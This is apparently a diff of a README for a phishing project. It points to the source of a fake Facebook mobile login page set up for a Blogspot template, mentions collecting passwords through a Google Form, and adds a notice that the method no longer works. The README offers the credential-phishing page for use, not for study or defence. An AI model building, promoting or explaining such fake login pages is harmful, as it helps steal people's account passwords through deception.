MTHS1901/facebook-login-screen-mobile/README.md

 #### The source code of the website with a fake facebook login screen is here: https://github.com/MTHS1901/facebook-mobile-xploit/blob/master/index.html
 note that this source code is configured to work on a blogspot template, if you are going to use it on a simple HTML page you need to modify it to make it work.
+#⚠️Alert
+# Google has completely changed the way in which its forms are sent via POST, so this tutorial is no longer compatible.

 # where do you get passwords in the google form.